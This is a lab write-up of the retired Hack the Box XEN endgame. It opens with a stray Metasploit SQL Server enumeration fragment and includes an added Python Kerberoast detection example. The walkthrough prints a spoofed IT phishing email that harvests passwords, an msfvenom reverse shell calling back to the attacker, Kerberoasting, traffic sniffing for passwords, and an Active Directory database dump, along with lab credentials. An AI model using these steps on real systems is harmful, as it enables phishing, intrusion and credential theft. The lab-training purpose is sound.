[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 - No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 - No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 - No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 - sp_replsetsyncstatus
[*] 10.13.38.11:1433 - sp_replcounters
[*] 10.13.38.11:1433 - sp_replsendtoqueue
[*] 10.13.38.11:1433 - sp_resyncexecutesql
[*] 10.13.38.11:1433 - sp_prepexecrpc
[*] 10.13.38.11:1433 - sp_repltrans
[*] 10.13.38.11:1433 - sp_xml_preparedocument
[*] 10.13.38.11:1433 - xp_qv
[*] 10.13.38.11:1433 - xp_getnetname
[*] 10.13.38.11:1433 - sp_releaseschemalock
[*] 10.13.38.11:1433 - sp_refreshview
[*] 10.13.38.11:1433 - sp_replcmds
[*] 10.13.38.11:1433 - sp_unprepare
[*] 10.13.38.11:1433 - sp_resyncprepare
[*] 10.13.38.11:1433 - sp_createorphan
[*] 10.13.38.11:1433 - xp_dirtree
[*] 10.13.38.11:1433 - sp_replwritetovarbin
[*] 10.13.38.11:1433 - sp_replsetoriginator
[*] 10.13.38.11:1433 - sp_xml_removedocument
[*] 10.13.38.11:1433 - sp_repldone
[*] 10.13.38.11:1433 - sp_reset_connection
[*] 10.13.38.11:1433 - xp_fileexist
[*] 10.13.38.11:1433 - xp_fixeddrives
[*] 10.13.38.11:1433 - sp_getschemalock
[*] 10.13.38.11:1433 - sp_prepexec
[*] 10.13.38.11:1433 - xp_revokelogin
[*] 10.13.38.11:1433 - sp_execute_external_script
[*] 10.13.38.11:1433 - sp_resyncuniquetable
[*] 10.13.38.11:1433 - sp_replflush
[*] 10.13.38.11:1433 - sp_resyncexecute
[*] 10.13.38.11:1433 - xp_grantlogin
[*] 10.13.38.11:1433 - sp_droporphans
[*] 10.13.38.11:1433 - xp_regread
[*] 10.13.38.11:1433 - sp_getbindtoken
[*] 10.13.38.11:1433 - sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle

 

htb-endgame-xen

Hack the Box – XEN (retired June 2020)

First I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb.

NMAP

As always we start with an nmap scan.

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let's take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443; the certificate for the site revealed a new domain, humongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn't come up with anything useful.

wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting, but the ones I wanted to look at were Remote and Jakarta.

Opening https://humongousretail.com/remote, I get the following.

And browsing https://humongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful; I looked deeper into the directories and for known exploits for the XenApp application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory rather than Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had seen examples in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone.

smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I had found 4 addresses;

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails with a lot of different subjects.  I eventually got a hit with the subject of Remote.  My idea was to try to get the users to click on my link.  The message I sent was as follows:

telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@humongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal

Hi,

The URL for the remote portal has now been changed to http://10.14.15.106

Regards
IT
.
QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I now had 3 users:

  • pmorgan:Summer1Summer!
  • jmendes:VivaBARC3L0N@!!!
  • awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan.

And I now had access to a desktop.

I tried this for each user that I had, and each of them worked and successfully logged in.

I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to open with the Citrix Receiver Engine, after I had installed icaclientWeb_19.12.0.19_amd64.deb on Kali.

Once I had clicked OK, I was presented with a Desktop.  I browsed to the Desktop of the user and was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges.  I first made a note of all the users and the desktops they were assigned to.

I created the reverse shell payload I wanted so that I could get a meterpreter session.

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe

I then proceeded to set up my msfconsole handler as follows.

Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session in the background and started the suggester.

use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit.

use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network, I saw the internal network was 172.16.249.0/24 and wanted to perform a quick scan of it to identify hosts. To pivot into the internal network, I used a socks proxy within msf.

use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IPs of the desktops, I chose to scan only a small range, .199 to .210.

I managed to get an additional 3 IPs.

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

With a domain controller in reach, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I uploaded the Kerberoasting tool (Rubeus).

Further credentials

I now wanted to see if there were any further credentials that I could find

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we use the batch file on the Desktop]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc[…]

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this ticket hash to a file named mturner so that I could run it through hashcat.

I exhausted all the password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential, found at https://github.com/NSAKEY/nsarules.git.

hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debug-file=matched.rule --force -O

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!
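From the defender's side, the Rubeus request above shows up on the domain controller as Security Event ID 4769 with a ticket encryption type of 0x17 (RC4_HMAC, the "RC4_HMAC_DEFAULT" Rubeus reported) for a user account's SPN. The following Python filter is an added example, not part of the write-up: it runs that heuristic over constructed sample events in a simplified JSON-lines export. Field names follow the 4769 event data, but the requests and the client IPs (.205 to .207) are made up.

```python
import json
from collections import defaultdict

# Constructed sample events: a simplified JSON-lines export of Windows
# Security log Event ID 4769 ("A Kerberos service ticket was requested").
# Account names echo the write-up; the requests themselves are invented.
SAMPLE_LOG = """
{"EventID": 4769, "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "mturner", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:172.16.249.205"}
{"EventID": 4769, "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "CITRIX$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:172.16.249.205"}
{"EventID": 4769, "TargetUserName": "jmendes@HTB.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:172.16.249.206"}
{"EventID": 4769, "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "svc-example", "TicketEncryptionType": "0x17", "Status": "0x7", "IpAddress": "::ffff:172.16.249.205"}
{"EventID": 4768, "TargetUserName": "awardel", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:172.16.249.207"}
"""

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES tickets are 0x11 / 0x12


def parse_events(log_text):
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def is_kerberoast_candidate(event):
    """A *successful* TGS request for an RC4 ticket to a service account that
    is neither a machine account (name ends in '$') nor krbtgt is the classic
    Kerberoast signature: AES-capable hosts normally never ask for RC4."""
    service = event.get("ServiceName", "")
    return (
        event.get("EventID") == 4769
        and event.get("Status") == "0x0"
        and event.get("TicketEncryptionType", "").lower() == RC4_HMAC
        and not service.endswith("$")
        and service.lower() != "krbtgt"
    )


def kerberoast_alerts(log_text):
    """Return (requesting account, source IP, roasted service) per candidate."""
    return [
        (e["TargetUserName"], e["IpAddress"], e["ServiceName"])
        for e in parse_events(log_text)
        if is_kerberoast_candidate(e)
    ]


def services_per_requester(log_text):
    """Count distinct service accounts each requester roasted. One client
    asking for many SPNs in a short window is a far stronger signal than a
    single RC4 ticket on its own."""
    seen = defaultdict(set)
    for user, _ip, service in kerberoast_alerts(log_text):
        seen[user].add(service)
    return {user: len(services) for user, services in seen.items()}


if __name__ == "__main__":
    for alert in kerberoast_alerts(SAMPLE_LOG):
        print("RC4 service ticket requested:", alert)
    print(services_per_requester(SAMPLE_LOG))
```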

SMB Access

Now that I had the new credentials, I looked about a little more to see what else I could find.  I eventually found SMB on 172.16.249.201 and decided to use the credentials I had found to see if I could see anything.

proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201

This showed that we had read access to the files located in the Citrix$ share.  I connected to it with smbclient to see what was inside.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these file and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in putty but has a password on it too.  I needed to crack the password before I could proceed, so I converted the key with putty2john.

putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had, so I looked elsewhere for something I could use as a password list generator.  I found a generator that seemed interesting and decided to run with it: https://github.com/hashcat/kwprocessor

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route

Once I had the password list generated, I put it through john to try to crack the hash again.

john -w=./passes private.hash

Now that I knew the password for the file, I could convert it for use on my system.  To do this, I used puttygen.

puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

While gathering information I had accumulated many user IDs, and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found that the default username of these devices is nsroot and attempted to log in with it.

proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through it, and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results.

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"

4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had access to this box as root, I wanted to perform some additional tests to see what other traffic was being passed through it.  The previous flag seemed to suggest LDAP could be in use. I set up a tcpdump to capture this for me.

tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf > exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151e
a644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

A doppelganger is a look-alike who is not biologically related (Wikipedia).  This gave me the hint to look back at the other accounts that were active on the domain.  I immediately got a shell again on the desktop and looked up the domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler account.  These two essentially shared the same password; this was our doppelganger. I then tried to log in to the domain controller using WinRM and proxychains to see if I could get access, because I knew the account was a member of the Backup Operators group, which generally has access.

proxychains ruby winrm_shell_with_upload.rb

root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved with simply logging in through WinRM.

whoami /priv

This was interesting.  It seems I had a few privileges including Backup and Restore.  This seemed obvious though, with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with the backup privileges.  I had recently done an exercise at the office where I work on retrieving the Active Directory database to extract the hashes.  This is something I do on a regular basis, so I knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin.  However, I then found an article which covered doing this with diskshadow.  This was highlighted in the following document: https://github.com/decoderit/whoamipriv-Hackinparis2019/blob/master/whoamiprivParis_Split.pdf.  I wanted to try and get RDP access to the machine and therefore set up a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to use xfreerdp through proxychains instead of remmina, to hopefully give myself a little more access.

Install freerdp-x11:

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:

Once I had created the backup, I restored the files from it by importing the modules found at

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline, I needed to extract the hashes.

python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

